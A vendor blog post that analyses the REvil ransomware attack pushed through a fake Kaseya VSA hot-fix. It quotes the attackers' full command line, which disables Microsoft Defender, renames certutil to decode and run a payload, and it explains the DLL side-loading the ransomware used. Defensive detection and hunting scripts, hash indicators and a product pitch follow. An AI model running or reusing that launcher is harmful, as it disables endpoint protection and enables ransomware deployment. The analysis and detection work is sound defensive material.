Deconstructing the REvil Ransomware Attack on Kaseya VSA
July 7, 2021 | Bar Block
Following on the heels of the SolarWinds SunBurst attack, a new supply chain attack is unfolding around Kaseya. This past Friday the software vendor announced that its VSA product, a remote monitoring and management tool that gives IT teams and managed service providers remote control of the machines in the networks they manage, had been compromised and used to push ransomware into Kaseya customers' environments. The company advised all of its customers to shut down their VSA servers immediately.
Here's what we know so far. Kaseya VSA was attacked through a zero-day vulnerability in the product that, at the time of writing, has no patch. After exploiting it on customers' VSA servers, the attackers created a fake automated update named "Kaseya VSA Agent Hot-fix" and used VSA's own deployment mechanism to push it to every endpoint those servers managed. Administrative access to the compromised VSA servers was disabled, and the notorious REvil (aka Sodinokibi) ransomware was delivered to the managed machines. Making matters worse, many of the affected Kaseya customers are managed service providers (MSPs) that use one VSA server to administer multiple downstream client networks, so the attack reached those clients' networks as well. An organization did not need to own or run Kaseya VSA to be hit; a VSA agent installed by its MSP was enough.
The fake update, which was installed automatically on every managed system, wrote a file named "agent.crt" into the VSA agent's working directory, which by default is "c:\kworking". It then ran a single cmd.exe command line. The leading loopback ping with -n 4979 is not a connectivity check but a timer: one echo request per second, roughly 83 minutes, before anything visible happens. The command line then calls PowerShell's Set-MpPreference to switch off Microsoft Defender's real-time monitoring, IOAV protection, script scanning and several other features, copies the legitimate "certutil.exe" to "C:\Windows\cert.exe", appends a random value to the copy so its hash no longer matches the known-good binary, uses the copy to base64-decode "agent.crt" into "agent.exe" in the same folder, deletes both "agent.crt" and "cert.exe", and finally runs "agent.exe".
ping 127.0.0.1 -n 4979 > nul &
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
The command line run by the fake update: PowerShell disables Microsoft Defender features, and a renamed copy of certutil.exe decodes "agent.crt" into "agent.exe"
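The chain above can be caught from process-creation telemetry (Sysmon event 1 or Windows event 4688 with command-line logging) without waiting for a file hash. The following is an added example, not code from the original post or from Kaseya or Deep Instinct: it scores a command line against each step of the chain and only flags events that trip several steps at once, so an administrator who runs Set-MpPreference on its own does not page anyone. The rule names, the threshold of three and the process events are assumptions constructed for the example; the first sample event is the command line quoted above.

```python
"""Score process command lines against the steps of the Kaseya/REvil launcher.

Added example, not code from the original post. Rule names, the threshold
and the sample events are constructed for illustration.
"""
import re

SEC_PER_PING = 1  # ping -n N waits about one second per reply, so N is a sleep in seconds


def ping_sleep(cmd):
    # "ping 127.0.0.1 -n 4979 > nul" is a timer, not a connectivity test
    m = re.search(r"\bping\s+127\.0\.0\.1\s+-n\s+(\d+)", cmd, re.I)
    return bool(m) and int(m.group(1)) * SEC_PER_PING >= 60


def defender_tamper(cmd):
    # Set-MpPreference turning a Defender protection feature off
    return bool(re.search(r"\bSet-MpPreference\b", cmd, re.I)) and bool(
        re.search(
            r"-Disable(RealtimeMonitoring|IOAVProtection|ScriptScanning|"
            r"IntrusionPreventionSystem)\s+\$true",
            cmd, re.I))


def certutil_renamed(cmd):
    # certutil.exe copied to a destination whose basename is not certutil.exe
    for m in re.finditer(r"\bcopy\s+(?:/y\s+)?(\S*certutil\.exe)\s+(\S+)", cmd, re.I):
        dest = m.group(2).replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if dest != "certutil.exe":
            return True
    return False


def decode_to_exe(cmd):
    # "-decode <input> <output>" where the output is an executable
    return bool(re.search(r"-decode\s+\S+\s+\S+\.exe\b", cmd, re.I))


def hash_busting(cmd):
    # junk appended to a copied binary so its hash no longer matches the original
    return bool(re.search(r"\becho\s+%random%\s*>>\s*\S+\.exe\b", cmd, re.I))


def kworking_exec(cmd):
    # anything executed out of the VSA agent working directory
    return bool(re.search(r"c:\\kworking\\[^\s&|]+\.exe\b", cmd, re.I))


RULES = [
    ("ping_sleep", ping_sleep),
    ("defender_tamper", defender_tamper),
    ("certutil_renamed", certutil_renamed),
    ("decode_to_exe", decode_to_exe),
    ("hash_busting", hash_busting),
    ("kworking_exec", kworking_exec),
]


def score_command_line(cmd):
    """Names of the rules a single command line trips, in RULES order."""
    return [name for name, rule in RULES if rule(cmd)]


def triage(events, threshold=3):
    """Events (dicts with a CommandLine field) whose rule count reaches the threshold."""
    out = []
    for i, ev in enumerate(events):
        hits = score_command_line(ev.get("CommandLine", ""))
        if len(hits) >= threshold:
            out.append({"index": i, "image": ev.get("Image"), "hits": hits})
    return out


# Constructed process-creation events. Event 0 is the chain from the post; the
# others are everyday admin activity that shares at most one step with it.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": (
         r"ping 127.0.0.1 -n 4979 > nul & "
         r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference "
         r"-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true "
         r"-DisableIOAVProtection $true -DisableScriptScanning $true "
         r"-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force "
         r"-MAPSReporting Disabled -SubmitSamplesConsent NeverSend & "
         r"copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & "
         r"echo %RANDOM% >> C:\Windows\cert.exe & "
         r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & "
         r"del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe")},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -decode C:\Users\admin\cert.b64 C:\Users\admin\cert.cer"},
    {"Image": r"C:\Windows\System32\PING.EXE",
     "CommandLine": r"ping 127.0.0.1 -n 2"},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit)
```

Only the first event reaches the threshold; the lone Set-MpPreference, the benign certutil decode of a certificate and the two-packet ping each score at most one rule. Lower the threshold to one and you get the noise an unweighted rule set produces, which is why the scoring is combined rather than alerting per step.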
"agent.exe" was signed with a "PB03 TRANSPORT LTD" certificate and contained two embedded files: a legitimate, Microsoft-signed Windows Defender executable, "MsMpEng.exe", and "mpsvc.dll", which was the REvil encryptor. agent.exe drops the two side by side and launches MsMpEng.exe. Because Windows searches the executable's own directory before the system directories when resolving a DLL that is not already loaded, MsMpEng.exe picks up the attacker's mpsvc.dll instead of the real Defender library. This technique, DLL side-loading, runs the encryption inside a process that is signed by Microsoft and carries a familiar name, which is less likely to raise a red flag with security tools or analysts. The practical check is simple: MsMpEng.exe has no business running from anywhere other than Defender's own install directory, and an mpsvc.dll that is not signed by Microsoft should never be loaded into it.
Typically, REvil uses double extortion to pressure its victims into paying: data is encrypted, but some of it is also stolen beforehand, with the threat that it will be published if the ransom is not paid on time and in full. Early indications are that the gang did not pursue that tactic here, opting instead to encrypt files and delete backups so that infected companies have to pay the full ransom to recover their files.
Scoping the Extent of the Damage
Kaseya claims that fewer than 40 of its customers were affected by the attack, but since many of those customers are MSPs with multiple clients of their own, the extent of the damage is hard to determine at this stage and is likely far larger than is currently being reported. As of now, an estimated 20 of Kaseya's MSP customers were infected with REvil, and the number of affected organizations is at least 200; it may reach into the thousands as more companies disclose that they were hit.
One of the first companies to disclose that it had been impacted was the Swedish supermarket chain Coop, whose cash registers and self-service checkouts could not be used as a result of the REvil infection in its network, forcing it to close some 800 stores until further notice. It is important to note that Coop is not a Kaseya VSA customer; the chain was infected because Visma, the MSP that manages its payment systems, is a Kaseya customer and was compromised as a result of the breach. This is the wider implication of any ransomware attack: it may start with one target, but the infection spreads quickly to connected organizations and networks if the proper detection and prevention tools are not in place.
As of now, there is no patch for the VSA vulnerability, and Kaseya customers are advised to keep their VSA servers shut down until a fix is available in order to stop further infections.
Taking a prevention-first approach is the best deterrent to ransomware. At Deep Instinct, we detect and prevent both known and zero-day ransomware in pre-execution, stopping it before it can infect files.
If you’d like to learn more about our industry-leading approach to stopping ransomware, backed by a $3M guarantee, please download our new eBook, Ransomware: Why Prevention is better than the Cure. Or speak with a sales representative today and we can prove our no-ransomware promise with a demo.
Indicators of Compromise
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e - agent.exe
df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e - agent.exe
dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f - agent.exe
aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7 - agent.exe
66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8 - agent.exe
81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471 - agent.exe
1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e - agent.exe
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd - mpsvc.dll
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 - mpsvc.dll
d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20 - mpsvc.dll
d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f - mpsvc.dll
cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6 - mpsvc.dll
0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402 - mpsvc.dll
8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f - mpsvc.dll
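The hashes above catch the seven known builds of each file and nothing else; the side-loading layout described earlier survives a recompile. The following hunt script is an added example, not code from the original post or from Deep Instinct. It walks a directory tree and reports any file whose SHA-256 is on the list above, and any MsMpEng.exe that has an mpsvc.dll beside it outside the directories where Defender is installed on a standard Windows host. Those "legitimate" directory suffixes are an assumption, and the sample tree the script builds in a temporary directory is constructed for the example from placeholder bytes, not real samples.

```python
"""Hunt a file tree for the REvil side-loading pair and the published hashes.

Added example, not from the original post. The Defender directory suffixes
are an assumption about a default install; the sample tree is constructed.
"""
import hashlib
import os
import tempfile

# SHA-256 indicators from the list in the post.
IOC_SHA256 = {
    "d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e": "agent.exe",
    "df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e": "agent.exe",
    "dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f": "agent.exe",
    "aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7": "agent.exe",
    "66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8": "agent.exe",
    "81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471": "agent.exe",
    "1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e": "agent.exe",
    "8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd": "mpsvc.dll",
    "e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2": "mpsvc.dll",
    "d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20": "mpsvc.dll",
    "d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f": "mpsvc.dll",
    "cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6": "mpsvc.dll",
    "0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402": "mpsvc.dll",
    "8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f": "mpsvc.dll",
}

# Assumed locations where MsMpEng.exe legitimately lives (path suffixes, case-insensitive).
LEGIT_DEFENDER_SUFFIXES = (
    r"\program files\windows defender",
    r"\microsoft\windows defender\platform",
)


def sha256_of(path, chunk=1 << 20):
    """Streamed SHA-256 of a file."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def is_defender_dir(directory, suffixes=LEGIT_DEFENDER_SUFFIXES):
    norm = directory.replace("/", "\\").lower()
    return any(s in norm for s in suffixes)


def hunt(root, iocs=IOC_SHA256, suffixes=LEGIT_DEFENDER_SUFFIXES):
    """Findings: hash matches plus MsMpEng.exe/mpsvc.dll pairs outside Defender's directories."""
    findings = []
    for dirpath, _subdirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            digest = sha256_of(path)
            if digest in iocs:
                findings.append({"type": "ioc_hash", "path": path,
                                 "ioc_name": iocs[digest], "sha256": digest})
        lower = {n.lower(): n for n in files}
        if ("msmpeng.exe" in lower and "mpsvc.dll" in lower
                and not is_defender_dir(dirpath, suffixes)):
            findings.append({"type": "sideload_pair",
                             "path": os.path.join(dirpath, lower["msmpeng.exe"]),
                             "dll": os.path.join(dirpath, lower["mpsvc.dll"])})
    return findings


def build_sample_tree(base):
    """Constructed layout: a dropped pair under Windows, a genuine-looking Defender
    install that must not fire, and a placeholder agent.exe in kworking."""
    layout = {
        "Windows/MsMpEng.exe": b"MZ placeholder: signed Defender engine (not real)",
        "Windows/mpsvc.dll": b"MZ placeholder: attacker DLL (not real)",
        "Program Files/Windows Defender/MsMpEng.exe": b"MZ placeholder: genuine engine",
        "Program Files/Windows Defender/mpsvc.dll": b"MZ placeholder: genuine dll",
        "kworking/agent.exe": b"MZ placeholder: decoded dropper (not real)",
    }
    paths = {}
    for rel, data in layout.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        paths[rel] = path
    return paths


def demo():
    """Build the sample tree in a temp dir, hunt it, clean up, and return the findings."""
    with tempfile.TemporaryDirectory() as base:
        paths = build_sample_tree(base)
        # The placeholder is not a real sample; its digest is added to the
        # indicator set only so the hash branch is exercised in this demo.
        iocs = dict(IOC_SHA256)
        iocs[sha256_of(paths["kworking/agent.exe"])] = "agent.exe (placeholder)"
        return hunt(base, iocs=iocs)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Point hunt() at a drive root on a suspect host and it returns one finding per hit. The pair check is a location allowlist, so a real deployment should pair it with an Authenticode check on mpsvc.dll: the genuine library is Microsoft-signed, the REvil one is not.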